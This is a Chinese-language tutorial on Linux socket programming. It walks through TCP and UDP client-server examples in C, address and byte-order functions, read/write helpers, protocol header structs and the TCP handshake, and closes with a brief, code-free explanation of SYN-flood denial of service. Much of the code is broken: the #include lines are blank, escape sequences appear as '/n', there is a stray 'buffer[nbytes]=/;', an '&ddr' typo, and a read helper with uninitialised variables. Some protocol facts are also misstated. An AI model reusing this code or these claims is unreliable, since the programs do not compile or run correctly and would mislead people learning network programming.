当前位置:   article > 正文

TCP/UDP文章_as3.0 udp

as3.0 udp


学习Linux网络编程(1)


这篇教程是用来介绍在Linux下编写网络程序的.

-----------------------------------------------------------------

Linux 系统的一个主要特点是他的网络功能非常强大。随着网络的日益普及,基于网络的应用也将越来越多。 在这个网络时代,掌握了Linux的网络编程技术,将令每一个人处于不败之地,学习Linux的网络编程,可以让我们真正的体会到网络的魅力。 想成为一位真正的hacker,必须掌握网络编程技术。
现在书店里面已经有了许多关于Linux网络编程方面的书籍,网络上也有了许多关于网 络编程方面的教材,大家都可以 去看一看的。在这里我会和大家一起来领会Linux网络编程的奥妙,由于我学习Linux的网络编程也开始不久,所以我下面所说的肯定会有错误的, 还请大家指点出来,在这里我先谢谢大家了。

在这一个章节里面,我会和以前的几个章节不同,在前面我都是概括的说了一下, 从现在开始我会尽可能的详细的说明每一个函数及其用法。好了让我们去领会Linux的伟大的魅力吧!

1. Linux网络知识介绍

1.1 客户端程序和服务端程序
网络程序和普通的程序有一个最大的区别是网络程序是由两个部分组成的--客户端和服务器端.

网络程序是先有服务器程序启动,等待客户端的程序运行并建立连接.一般的来说是服务端的程序 在一个端口上监听,直到有一个客户端的程序发来了请求.

1.2 常用的命令
由于网络程序是有两个部分组成,所以在调试的时候比较麻烦,为此我们有必要知道一些常用的网络命令

netstat
命令netstat是用来显示网络的连接,路由表和接口统计等网络的信息.netstat有许多的选项 我们常用的选项是 -an 用来显示详细的网络状态.至于其它的选项我们可以使用帮助手册获得详细的情况.

telnet
telnet是一个用来远程控制的程序,但是我们完全可以用这个程序来调试我们的服务端程序的. 比如我们的服务器程序在监听8888端口,我们可以用telnet localhost 8888来查看服务端的状况.

1.3 TCP/UDP介绍
TCP(Transfer Control Protocol)传输控制协议是一种面向连接的协议,当我们的网络程序使用 这个协议的时候,网络可以保证我们的客户端和服务端的连接是可靠的,安全的.

UDP(User Datagram Protocol)用户数据报协议是一种非面向连接的协议,这种协议并不能保证我们 的网络程序的连接是可靠的,所以我们现在编写的程序一般是采用TCP协议的.

2. 初等网络函数介绍(TCP)
Linux 系统是通过提供套接字(socket)来进行网络编程的.网络程序通过socket和其它几个函数的调用,会返回一个 通讯的文件描述符,我们可以将这个描述符看成普通的文件的描述符来操作,这就是linux的设备无关性的 好处.我们可以通过向描述符读写操作实现网络之间的数据交流.

2.1 socket
int socket(int domain, int type,int protocol)

domain: 说明我们网络程序所在的主机采用的通讯协族(AF_UNIX和AF_INET等). AF_UNIX只能够用于单一的Unix系统进程间通信,而AF_INET是针对Internet的,因而可以允许在远程 主机之间通信(当我们 man socket时发现 domain可选项是 PF_*而不是AF_*,因为glibc是posix的实现 所以用PF代替了AF,不过我们都可以使用的).

type:我们网络程序所采用的通讯协议(SOCK_STREAM, SOCK_DGRAM等) SOCK_STREAM表明我们用的是TCP协议,这样会提供按顺序的,可靠,双向,面向连接的比特流. SOCK_DGRAM 表明我们用的是UDP协议,这样只会提供定长的,不可靠,无连接的通信.

protocol:由于我们指定了type,所以这个地方我们一般只要用0来代替就可以了 socket为网络通讯做基本的准备.成功时返回文件描述符,失败时返回-1,看errno可知道出错的详细情况.


2.2 bind
int bind(int sockfd, struct sockaddr *my_addr, int addrlen)

sockfd:是由socket调用返回的文件描述符.

addrlen:是sockaddr结构的长度.

my_addr:是一个指向sockaddr的指针. 在中有 sockaddr的定义

struct sockaddr{
unisgned short as_family;
char sa_data[14];
};

不过由于系统的兼容性,我们一般不用这个头文件,而使用另外一个结构(struct sockaddr_in) 来代替.在中有sockaddr_in的定义
struct sockaddr_in{
unsigned short sin_family;
unsigned short int sin_port;
struct in_addr sin_addr;
unsigned char sin_zero[8];

我 们主要使用Internet所以sin_family一般为AF_INET,sin_addr设置为INADDR_ANY表示可以 和任何的主机通信,sin_port是我们要监听的端口号.sin_zero[8]是用来填充的. bind将本地的端口同socket返回的文件描述符捆绑在一起.成功是返回0,失败的情况和socket一样

2.3 listen
int listen(int sockfd,int backlog)

sockfd:是bind后的文件描述符.

backlog:设置请求排队的最大长度.当有多个客户端程序和服务端相连时, 使用这个表示可以介绍的排队长度. listen函数将bind的文件描述符变为监听套接字.返回的情况和bind一样.


2.4 accept
int accept(int sockfd, struct sockaddr *addr,int *addrlen)

sockfd:是listen后的文件描述符.

addr, addrlen是用来给客户端的程序填写的,服务器端只要传递指针就可以了. bind,listen和accept是服务器端用的函数,accept调用时,服务器端的程序会一直阻塞到有一个 客户程序发出了连接. accept成功时返回最后的服务器端的文件描述符,这个时候服务器端可以向该描述符写信息了. 失败时返回-1


2.5 connect
int connect(int sockfd, struct sockaddr * serv_addr,int addrlen)

sockfd:socket返回的文件描述符.

serv_addr:储存了服务器端的连接信息.其中sin_add是服务端的地址

addrlen:serv_addr的长度

connect函数是客户端用来同服务端连接的.成功时返回0,sockfd是同服务端通讯的文件描述符 失败时返回-1.


2.6 实例

服务器端程序


/******* 服务器程序 (server.c) ************/
#include
#include
#include
#include
#include
#include
#include
#include

int main(int argc, char *argv[])
{
int sockfd,new_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size,portnumber;
char hello[]="Hello! Are You Fine?/n";

if(argc!=2)
{
fprintf(stderr,"Usage:%s portnumber/a/n",argv[0]);
exit(1);
}

if((portnumber=atoi(argv[1]))<0)
{
fprintf(stderr,"Usage:%s portnumber/a/n",argv[0]);
exit(1);
}

/* 服务器端开始建立socket描述符 */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
fprintf(stderr,"Socket error:%s/n/a",strerror(errno));
exit(1);
}

/* 服务器端填充 sockaddr结构 */
bzero(&server_addr,sizeof(struct sockaddr_in));
server_addr.sin_family=AF_INET;
server_addr.sin_addr.s_addr=htonl(INADDR_ANY);
server_addr.sin_port=htons(portnumber);

/* 捆绑sockfd描述符 */
if(bind(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==-1)
{
fprintf(stderr,"Bind error:%s/n/a",strerror(errno));
exit(1);
}

/* 监听sockfd描述符 */
if(listen(sockfd,5)==-1)
{
fprintf(stderr,"Listen error:%s/n/a",strerror(errno));
exit(1);
}

while(1)
{
/* 服务器阻塞,直到客户程序建立连接 */
sin_size=sizeof(struct sockaddr_in);
if((new_fd=accept(sockfd,(struct sockaddr *)(&client_addr),&sin_size))==-1)
{
fprintf(stderr,"Accept error:%s/n/a",strerror(errno));
exit(1);
}

fprintf(stderr,"Server get connection from %s/n",
inet_ntoa(client_addr.sin_addr));
if(write(new_fd,hello,strlen(hello))==-1)
{
fprintf(stderr,"Write Error:%s/n",strerror(errno));
exit(1);
}
/* 这个通讯已经结束 */
close(new_fd);
/* 循环下一个 */
}
close(sockfd);
exit(0);
}


客户端程序

/******* 客户端程序 client.c ************/
#include
#include
#include
#include
#include
#include
#include
#include

int main(int argc, char *argv[])
{
int sockfd;
char buffer[1024];
struct sockaddr_in server_addr;
struct hostent *host;
int portnumber,nbytes;

if(argc!=3)
{
fprintf(stderr,"Usage:%s hostname portnumber/a/n",argv[0]);
exit(1);
}

if((host=gethostbyname(argv[1]))==NULL)
{
fprintf(stderr,"Gethostname error/n");
exit(1);
}

if((portnumber=atoi(argv[2]))<0)
{
fprintf(stderr,"Usage:%s hostname portnumber/a/n",argv[0]);
exit(1);
}

/* 客户程序开始建立 sockfd描述符 */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
fprintf(stderr,"Socket Error:%s/a/n",strerror(errno));
exit(1);
}

/* 客户程序填充服务端的资料 */
bzero(&server_addr,sizeof(server_addr));
server_addr.sin_family=AF_INET;
server_addr.sin_port=htons(portnumber);
server_addr.sin_addr=*((struct in_addr *)host->h_addr);

/* 客户程序发起连接请求 */
if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==-1)
{
fprintf(stderr,"Connect Error:%s/a/n",strerror(errno));
exit(1);
}

/* 连接成功了 */
if((nbytes=read(sockfd,buffer,1024))==-1)
{
fprintf(stderr,"Read Error:%s/n",strerror(errno));
exit(1);
}
buffer[nbytes]=/;
printf("I have received:%s/n",buffer);
/* 结束通讯 */
close(sockfd);
exit(0);
}


MakeFile
这里我们使用GNU 的make实用程序来编译. 关于make的详细说明见 Make 使用介绍

######### Makefile ###########
all:server client
server:server.c
gcc $^ -o $@
client:client.c
gcc $^ -o $@

运 行make后会产生两个程序server(服务器端)和client(客户端) 先运行./server portnumber& (portnumber随便取一个大于1204且不在/etc/services中出现的号码 就用8888好了),然后运行 ./client localhost 8888 看看有什么结果. (你也可以用telnet和netstat试一试.) 上面是一个最简单的网络程序,不过是不是也有点烦.上面有许多函数我们还没有解释. 我会在下一章进行的详细的说明.


2.7 总结
总的来说网络程序是由两个部分组成的--客户端和服务器端.它们的建立步骤一般是:

服务器端
socket-->bind-->listen-->accept

客户端
socket-->connect

3. 服务器和客户机的信息函数
这一章我们来学习转换和网络方面的信息函数.

3.1 字节转换函数
在网络上面有着许多类型的机器,这些机器在表示数据的字节顺序是不同的, 比如i386芯片是低字节在内存地址的低端,高字节在高端,而alpha芯片却相反. 为了统一起来,在Linux下面,有专门的字节转换函数.

unsigned long int htonl(unsigned long int hostlong)
unsigned short int htons(unisgned short int hostshort)
unsigned long int ntohl(unsigned long int netlong)
unsigned short int ntohs(unsigned short int netshort)

在这四个转换函数中,h 代表host, n 代表 network.s 代表short l 代表long 第一个函数的意义是将本机器上的long数据转化为网络上的long. 其他几个函数的意义也差不多.

3.2 IP和域名的转换
在网络上标志一台机器可以用IP或者是用域名.那么我们怎么去进行转换呢?

struct hostent *gethostbyname(const char *hostname)
struct hostent *gethostbyaddr(const char *addr,int len,int type)
在中有struct hostent的定义
struct hostent{
char *h_name; /* 主机的正式名称 */
char *h_aliases; /* 主机的别名 */
int h_addrtype; /* 主机的地址类型 AF_INET*/
int h_length; /* 主机的地址长度 对于IP4 是4字节32位*/
char **h_addr_list; /* 主机的IP地址列表 */
}
#define h_addr h_addr_list[0] /* 主机的第一个IP地址*/

gethostbyname可以将机器名(如 linux.yessun.com)转换为一个结构指针.在这个结构里面储存了域名的信息
gethostbyaddr可以将一个32位的IP地址(C0A80001)转换为结构指针.

这两个函数失败时返回NULL 且设置h_errno错误变量,调用h_strerror()可以得到详细的出错信息


3.3 字符串的IP和32位的IP转换.
在网络上面我们用的IP都是数字加点(192.168.0.1)构成的, 而在struct in_addr结构中用的是32位的IP, 我们上面那个32位IP(C0A80001)是的192.168.0.1 为了转换我们可以使用下面两个函数

int inet_aton(const char *cp,struct in_addr *inp)
char *inet_ntoa(struct in_addr in)

函数里面 a 代表 ascii n 代表network.第一个函数表示将a.b.c.d的IP转换为32位的IP,存储在 inp指针里面.第二个是将32位IP转换为a.b.c.d的格式.


3.4 服务信息函数
在网络程序里面我们有时候需要知道端口.IP和服务信息.这个时候我们可以使用以下几个函数

int getsockname(int sockfd,struct sockaddr *localaddr,int *addrlen)
int getpeername(int sockfd,struct sockaddr *peeraddr, int *addrlen)
struct servent *getservbyname(const char *servname,const char *protoname)
struct servent *getservbyport(int port,const char *protoname)
struct servent
{
char *s_name; /* 正式服务名 */
char **s_aliases; /* 别名列表 */
int s_port; /* 端口号 */
char *s_proto; /* 使用的协议 */
}

一般我们很少用这几个函数.对应客户端,当我们要得到连接的端口号时在connect调用成功后使用可得到 系统分配的端口号.对于服务端,我们用INADDR_ANY填充后,为了得到连接的IP我们可以在accept调用成功后 使用而得到IP地址.

在网络上有许多的默认端口和服务,比如端口21对ftp80对应WWW.为了得到指定的端口号的服务 我们可以调用第四个函数,相反为了得到端口号可以调用第三个函数.


3.5 一个例子

#include
#include
#include
#include
#include

int main(int argc ,char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char **alias;

if(argc<2)
{
fprintf(stderr,"Usage:%s hostname|ip../n/a",argv[0]);
exit(1);
}

argv++;
for(;*argv!=NULL;argv++)
{
/* 这里我们假设是IP*/
if(inet_aton(*argv,&addr.sin_addr)!=0)
{
host=gethostbyaddr((char *)&addr.sin_addr,4,AF_INET);
printf("Address information of Ip %s/n",*argv);
}
else
{
/* 失败,难道是域名?*/
host=gethostbyname(*argv); printf("Address information
of host %s/n",*argv);
}
if(host==NULL)
{
/* 都不是 ,算了不找了*/
fprintf(stderr,"No address information of %s/n",*argv);
continue;
}
printf("Official host name %s/n",host->h_name);
printf("Name aliases:");
for(alias=host->h_aliases;*alias!=NULL;alias++)
printf("%s ,",*alias);
printf("/nIp address:");
for(alias=host->h_addr_list;*alias!=NULL;alias++)
printf("%s ,",inet_ntoa(*(struct in_addr *)(*alias)));
}
}

在这个例子里面,为了判断用户输入的是IP还是域名我们调用了两个函数,第一次我们假设输入的是IP所以调用inet_aton, 失败的时候,再调用gethostbyname而得到信息.

4. 完整的读写函数
一旦我们建立了连接,我们的下一步就是进行通信了.在Linux下面把我们前面建立的通道 看成是文件描述符,这样服务器端和客户端进行通信时候,只要往文件描述符里面读写东西了. 就象我们往文件读写一样.


4.1 写函数write

ssize_t write(int fd,const void *buf,size_t nbytes)

write函数将buf中的nbytes字节内容写入文件描述符fd.成功时返回写的字节数.失败时返回-1. 并设置errno变量. 在网络程序中,当我们向套接字文件描述符写时有俩种可能.

1)write的返回值大于0,表示写了部分或者是全部的数据.

2)返回的值小于0,此时出现了错误.我们要根据错误类型来处理.

如果错误为EINTR表示在写的时候出现了中断错误.

如果为EPIPE表示网络连接出现了问题(对方已经关闭了连接).

为了处理以上的情况,我们自己编写一个写函数来处理这几种情况.


int my_write(int fd,void *buffer,int length)
{
int bytes_left;
int written_bytes;
char *ptr;

ptr=buffer;
bytes_left=length;
while(bytes_left>0)
{
/* 开始写*/
written_bytes=write(fd,ptr,bytes_left);
if(written_bytes<=0) /* 出错了*/
{
if(errno==EINTR) /* 中断错误 我们继续写*/
written_bytes=0;
else /* 其他错误 没有办法,只好撤退了*/
return(-1);
}
bytes_left-=written_bytes;
ptr+=written_bytes; /* 从剩下的地方继续写 */
}
return(0);
}

4.2 读函数read
ssize_t read(int fd,void *buf,size_t nbyte) read函数是负责从fd中读取内容.当读成功时,read返回实际所读的字节数,如果返回的值是0 表示已经读到文件的结束了,小于0表示出现了错误.如果错误为EINTR说明读是由中断引起的, 如果是ECONNREST表示网络连接出了问题. 和上面一样,我们也写一个自己的读函数.

int my_read(int fd,void *buffer,int length)
{
int bytes_left;
int bytes_read;
char *ptr;

bytes_left=length;
while(bytes_left>0)
{
bytes_read=read(fd,ptr,bytes_read);
if(bytes_read<0)
{
if(errno==EINTR)
bytes_read=0;
else
return(-1);
}
else if(bytes_read==0)
break;
bytes_left-=bytes_read;
ptr+=bytes_read;
}
return(length-bytes_left);
}

4.3 数据的传递
有了上面的两个函数,我们就可以向客户端或者是服务端传递数据了.比如我们要传递一个结构.可以使用如下方式

/* 客户端向服务端写 */

struct my_struct my_struct_client;
write(fd,(void *)&my_struct_client,sizeof(struct my_struct);

/* 服务端的读*/
char buffer[sizeof(struct my_struct)];
struct *my_struct_server;
read(fd,(void *)buffer,sizeof(struct my_struct));
my_struct_server=(struct my_struct *)buffer;

在网络上传递数据时我们一般都是把数据转化为char类型的数据传递.接收的时候也是一样的 注意的是我们没有必要在网络上传递指针(因为传递指针是没有任何意义的,我们必须传递指针所指向的内容)

5. 用户数据报发送
我 们前面已经学习网络程序的一个很大的部分,由这个部分的知识,我们实际上可以写出大部分的基于TCP协议的网络程序了.现在在Linux下的大部分程序都 是用我们上面所学的知识来写的.我们可以去找一些源程序来参考一下.这一章,我们简单的学习一下基于UDP协议的网络程序.

5.1 两个常用的函数

int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct sockaddr * from int *fromlen)
int sendto(int sockfd,const void *msg,int len,unsigned int flags,struct sockaddr *to int tolen)

sockfd, buf,len的意义和read,write一样,分别表示套接字描述符,发送或接收的缓冲区及大小.recvfrom负责从sockfd接收数据,如果 from不是NULL,那么在from里面存储了信息来源的情况,如果对信息的来源不感兴趣,可以将from和fromlen设置为 NULL.sendto负责向to发送信息.此时在to里面存储了收信息方的详细资料.


5.2 一个实例

/* 服务端程序 server.c */

#include
#include
#include
#include
#include
#define SERVER_PORT 8888
#define MAX_MSG_SIZE 1024

void udps_respon(int sockfd)
{
struct sockaddr_in addr;
int addrlen,n;
char msg[MAX_MSG_SIZE];

while(1)
{ /* 从网络上度,写到网络上面去 */
n=recvfrom(sockfd,msg,MAX_MSG_SIZE,0,
(struct sockaddr*)&addr,&addrlen);
msg[n]=0;
/* 显示服务端已经收到了信息 */
fprintf(stdout,"I have received %s",msg);
sendto(sockfd,msg,n,0,(struct sockaddr*)&addr,addrlen);
}
}

int main(void)
{
int sockfd;
struct sockaddr_in addr;

sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s/n",strerror(errno));
exit(1);
}
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_addr.s_addr=htonl(INADDR_ANY);
addr.sin_port=htons(SERVER_PORT);
if(bind(sockfd,(struct sockaddr *)&ddr,sizeof(struct sockaddr_in))<0)
{
fprintf(stderr,"Bind Error:%s/n",strerror(errno));
exit(1);
}
udps_respon(sockfd);
close(sockfd);
}


/* 客户端程序 */
#include
#include
#include
#include
#include
#include
#define MAX_BUF_SIZE 1024

void udpc_requ(int sockfd,const struct sockaddr_in *addr,int len)
{
char buffer[MAX_BUF_SIZE];
int n;
while(1)
{ /* 从键盘读入,写到服务端 */
fgets(buffer,MAX_BUF_SIZE,stdin);
sendto(sockfd,buffer,strlen(buffer),0,addr,len);
bzero(buffer,MAX_BUF_SIZE);
/* 从网络上读,写到屏幕上 */
n=recvfrom(sockfd,buffer,MAX_BUF_SIZE,0,NULL,NULL);
buffer[n]=0;
fputs(buffer,stdout);
}
}

int main(int argc,char **argv)
{
int sockfd,port;
struct sockaddr_in addr;

if(argc!=3)
{
fprintf(stderr,"Usage:%s server_ip server_port/n",argv[0]);
exit(1);
}

if((port=atoi(argv[2]))<0)
{
fprintf(stderr,"Usage:%s server_ip server_port/n",argv[0]);
exit(1);
}

sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s/n",strerror(errno));
exit(1);
}
/* 填充服务端的资料 */
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(inet_aton(argv[1],&addr.sin_addr)<0)
{
fprintf(stderr,"Ip error:%s/n",strerror(errno));
exit(1);
}
udpc_requ(sockfd,&addr,sizeof(struct sockaddr_in));
close(sockfd);
}

########### 编译文件 Makefile ##########
all:server client
server:server.c
gcc -o server server.c
client:client.c
gcc -o client client.c
clean:
rm -f server
rm -f client
rm -f core

上 面的实例如果大家编译运行的话,会发现一个小问题的. 在我机器上面,我先运行服务端,然后运行客户端.在客户端输入信息,发送到服务端, 在服务端显示已经收到信息,但是客户端没有反映.再运行一个客户端,向服务端发出信息 却可以得到反应.我想可能是第一个客户端已经阻塞了.如果谁知道怎么解决的话,请告诉我,谢谢. 由于UDP协议是不保证可靠接收数据的要求,所以我们在发送信息的时候,系统并不能够保证我们发出的信息都正确无误的到达目的地.一般的来说我们在编写网 络程序的时候都是选用TCP协议的.
6. 高级套接字函数
在前面的几个部分里面,我们已经学会了怎么样从网络上读写信息了.前面的一些函数(read,write)是网络程序里面最基本的函数.也是最原始的通信函数.在这一章里面,我们一起来学习网络通信的高级函数.这一章我们学习另外几个读写函数.

6.1 recv和send
recv和send函数提供了和read和write差不多的功能.不过它们提供 了第四个参数来控制读写操作.

int recv(int sockfd,void *buf,int len,int flags)
int send(int sockfd,void *buf,int len,int flags)

前面的三个参数和read,write一样,第四个参数可以是0或者是以下的组合
_______________________________________________________________
| MSG_DONTROUTE | 不查找路由表 |
| MSG_OOB | 接受或者发送带外数据 |
| MSG_PEEK | 查看数据,并不从系统缓冲区移走数据 |
| MSG_WAITALL | 等待所有数据 |
|--------------------------------------------------------------|

MSG_DONTROUTE:是send函数使用的标志.这个标志告诉IP协议.目的主机在本地网络上面,没有必要查找路由表.这个标志一般用网络诊断和路由程序里面.
MSG_OOB:表示可以接收和发送带外的数据.关于带外数据我们以后会解释的.

MSG_PEEK:是recv函数的使用标志,表示只是从系统缓冲区中读取内容,而不清楚系统缓冲区的内容.这样下次读的时候,仍然是一样的内容.一般在有多个进程读写数据时可以使用这个标志.

MSG_WAITALL 是recv函数的使用标志,表示等到所有的信息到达时才返回.使用这个标志的时候recv回一直阻塞,直到指定的条件满足,或者是发生了错误. 1)当读到了指定的字节时,函数正常返回.返回值等于len 2)当读到了文件的结尾时,函数正常返回.返回值小于len 3)当操作发生错误时,返回-1,且设置错误为相应的错误号(errno)

如果flags为0,则和read,write一样的操作.还有其它的几个选项,不过我们实际上用的很少,可以查看 Linux Programmers Manual得到详细解释.

6.2 recvfrom和sendto
这两个函数一般用在非套接字的网络程序当中(UDP),我们已经在前面学会了.

6.3 recvmsg和sendmsg
recvmsg和sendmsg可以实现前面所有的读写函数的功能.

int recvmsg(int sockfd,struct msghdr *msg,int flags)
int sendmsg(int sockfd,struct msghdr *msg,int flags)

struct msghdr
{
void *msg_name;
int msg_namelen;
struct iovec *msg_iov;
int msg_iovlen;
void *msg_control;
int msg_controllen;
int msg_flags;
}

struct iovec
{
void *iov_base; /* 缓冲区开始的地址 */
size_t iov_len; /* 缓冲区的长度 */
}

msg_name 和 msg_namelen当套接字是非面向连接时(UDP),它们存储接收和发送方的地址信息.msg_name实际上是一个指向struct sockaddr的指针,msg_name是结构的长度.当套接字是面向连接时,这两个值应设为NULL. msg_iov和msg_iovlen指出接受和发送的缓冲区内容.msg_iov是一个结构指针,msg_iovlen指出这个结构数组的大小. msg_control和msg_controllen这两个变量是用来接收和发送控制数据时的 msg_flags指定接受和发送的操作选项.和recv,send的选项一样
6.4 套接字的关闭
关闭套接字有两个函数close和shutdown.用close时和我们关闭文件一样.

6.5 shutdown

int shutdown(int sockfd,int howto)

TCP连接是双向的(是可读写的),当我们使用close时,会把读写通道都关闭,有时侯我们希望只关闭一个方向,这个时候我们可以使用shutdown.针对不同的howto,系统回采取不同的关闭方式.
howto=0这个时候系统会关闭读通道.但是可以继续往接字描述符写.

howto=1关闭写通道,和上面相反,着时候就只可以读了.

howto=2关闭读写通道,和close一样 在多进程程序里面,如果有几个子进程共享一个套接字时,如果我们使用shutdown, 那么所有的子进程都不能够操作了,这个时候我们只能够使用close来关闭子进程的套接字描述符.

7. TCP/IP协议
你也许听说过TCP/IP协议,那么你知道到底什么是TCP,什么是IP吗?在这一章里面,我们一起来学习这个目前网络上用最广泛的协议.


7.1 网络传输分层
如 果你考过计算机等级考试,那么你就应该已经知道了网络传输分层这个概念.在网络上,人们为了传输数据时的方便,把网络的传输分为7个层次.分别是:应用 层,表示层,会话层,传输层,网络层,数据链路层和物理层.分好了层以后,传输数据时,上一层如果要数据的话,就可以直接向下一层要了,而不必要管数据传 输的细节.下一层也只向它的上一层提供数据,而不要去管其它东西了.如果你不想考试,你没有必要去记这些东西的.只要知道是分层的,而且各层的作用不同.

7.2 IP协议
IP协议是在网络层的协议.它主要完成数据包的发送作用. 下面这个表是IP4的数据包格式

0 4 8 16 32
--------------------------------------------------
|版本 |首部长度|服务类型| 数据包总长 |
--------------------------------------------------
| 标识 |DF |MF| 碎片偏移 |
--------------------------------------------------
| 生存时间 | 协议 | 首部较验和 |
------------------------------------------------
| 源IP地址 |
------------------------------------------------
| 目的IP地址 |
-------------------------------------------------
| 选项 |
=================================================
| 数据 |
-------------------------------------------------

下面我们看一看IP的结构定义

struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
unsigned int ip_v:4; /* version */
unsigned int ip_hl:4; /* header length */
#endif
u_int8_t ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */
u_int8_t ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src, ip_dst; /* source and dest address */
};

ip_vIP协议的版本号,这里是4,现在IPV6已经出来了

ip_hlIP包首部长度,这个值以4字节为单位.IP协议首部的固定长度为20个字节,如果IP包没有选项,那么这个值为5.

ip_tos服务类型,说明提供的优先权.

ip_len说明IP数据的长度.以字节为单位.

ip_id标识这个IP数据包.

ip_off碎片偏移,这和上面ID一起用来重组碎片的.

ip_ttl生存时间.没经过一个路由的时候减一,直到为0时被抛弃.

ip_p协议,表示创建这个IP数据包的高层协议.如TCP,UDP协议.

ip_sum首部校验和,提供对首部数据的校验.

ip_src,ip_dst发送者和接收者的IP地址

关于IP协议的详细情况,请参考 RFC791

7.3 ICMP协议
ICMP是消息控制协议,也处于网络层.在网络上传递IP数据包时,如果发生了错误,那么就会用ICMP协议来报告错误.

ICMP包的结构如下:

0 8 16 32
---------------------------------------------------------------------
| 类型 | 代码 | 校验和 |
--------------------------------------------------------------------
| 数据 | 数据 |
--------------------------------------------------------------------

ICMP在中的定义是
struct icmphdr
{
u_int8_t type; /* message type */
u_int8_t code; /* type sub-code */
u_int16_t checksum;
union
{
struct
{
u_int16_t id;
u_int16_t sequence;
} echo; /* echo datagram */
u_int32_t gateway; /* gateway address */
struct
{
u_int16_t __unused;
u_int16_t mtu;
} frag; /* path mtu discovery */
} un;
};

关于ICMP协议的详细情况可以查看 RFC792

7.4 UDP协议
UDP协议是建立在IP协议基础之上的,用在传输层的协议.UDP和IP协议一样是不可靠的数据报服务.UDP的头格式为:


0 16 32
---------------------------------------------------
| UDP源端口 | UDP目的端口 |
---------------------------------------------------
| UDP数据报长度 | UDP数据报校验 |
---------------------------------------------------

UDP结构在中的定义为:
struct udphdr {
u_int16_t source;
u_int16_t dest;
u_int16_t len;
u_int16_t check;
};

关于UDP协议的详细情况,请参考 RFC768
7.5 TCP
TCP协议也是建立在IP协议之上的,不过TCP协议是可靠的.按照顺序发送的.TCP的数据结构比前面的结构都要复杂.

0 4 8 10 16 24 32
-------------------------------------------------------------------
| 源端口 | 目的端口 |
-------------------------------------------------------------------
| 序列号 |
------------------------------------------------------------------
| 确认号 |
------------------------------------------------------------------
| | |U|A|P|S|F| |
|首部长度| 保留 |R|C|S|Y|I| 窗口 |
| | |G|K|H|N|N| |
-----------------------------------------------------------------
| 校验和 | 紧急指针 |
-----------------------------------------------------------------
| 选项 | 填充字节 |
-----------------------------------------------------------------

TCP的结构在中定义为:
struct tcphdr
{
u_int16_t source;
u_int16_t dest;
u_int32_t seq;
u_int32_t ack_seq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
u_int16_t res1:4;
u_int16_t doff:4;
u_int16_t fin:1;
u_int16_t syn:1;
u_int16_t rst:1;
u_int16_t psh:1;
u_int16_t ack:1;
u_int16_t urg:1;
u_int16_t res2:2;
#elif __BYTE_ORDER == __BIG_ENDIAN
u_int16_t doff:4;
u_int16_t res1:4;
u_int16_t res2:2;
u_int16_t urg:1;
u_int16_t ack:1;
u_int16_t psh:1;
u_int16_t rst:1;
u_int16_t syn:1;
u_int16_t fin:1;
#endif
u_int16_t window;
u_int16_t check;
u_int16_t urg_prt;
};

source发送TCP数据的源端口
dest接受TCP数据的目的端口

seq标识该TCP所包含的数据字节的开始序列号

ack_seq确认序列号,表示接受方下一次接受的数据序列号.

doff数据首部长度.和IP协议一样,以4字节为单位.一般的时候为5

urg如果设置紧急数据指针,则该位为1

ack如果确认号正确,那么为1

psh如果设置为1,那么接收方收到数据后,立即交给上一层程序

rst为1的时候,表示请求重新连接

syn为1的时候,表示请求建立连接

fin为1的时候,表示亲戚关闭连接

window窗口,告诉接收者可以接收的大小

check对TCP数据进行较核

urg_ptr如果urg=1,那么指出紧急数据对于历史数据开始的序列号的偏移值

关于TCP协议的详细情况,请查看 RFC793


7.6 TCP连接的建立
TCP协议是一种可靠的连接,为了保证连接的可靠性,TCP的连接要分为几个步骤.我们把这个连接过程称为"三次握手".

下面我们从一个实例来分析建立连接的过程.

第一步客户机向服务器发送一个TCP数据包,表示请求建立连接. 为此,客户端将数据包的SYN位设置为1,并且设置序列号seq=1000(我们假设为1000).

第 二步服务器收到了数据包,并从SYN位为1知道这是一个建立请求的连接.于是服务器也向客户端发送一个TCP数据包.因为是响应客户机的请求,于是服务器 设置ACK为1,sak_seq=1001(1000+1)同时设置自己的序列号.seq=2000(我们假设为2000).

第三步客户机收到了服务器的TCP,并从ACK为1和ack_seq=1001知道是从服务器来的确认信息.于是客户机也向服务器发送确认信息.客户机设置ACK=1,和ack_seq=2001,seq=1001,发送给服务器.至此客户端完成连接.

最后一步服务器受到确认信息,也完成连接.

通过上面几个步骤,一个TCP连接就建立了.当然在建立过程中可能出现错误,不过TCP协议可以保证自己去处理错误的.


说一说其中的一种错误.
听说过DOS吗?(可不是操作系统啊).今年春节的时候,美国的五大网站一起受到攻击.攻击者用的就是DOS(拒绝式服务)方式.概括的说一下原理.
客户机先进行第一个步骤.服务器收到后,进行第二个步骤.按照正常的TCP连接,客户机应该进行第三个步骤.
不 过攻击者实际上并不进行第三个步骤.因为客户端在进行第一个步骤的时候,修改了自己的IP地址,就是说将一个实际上不存在的IP填充在自己IP数据包的发 送者的IP一栏.这样因为服务器发的IP地址没有人接收,所以服务端会收不到第三个步骤的确认信号,这样服务务端会在那边一直等待,直到超时.
这样当有大量的客户发出请求后,服务端会有大量等待,直到所有的资源被用光,而不能再接收客户机的请求.
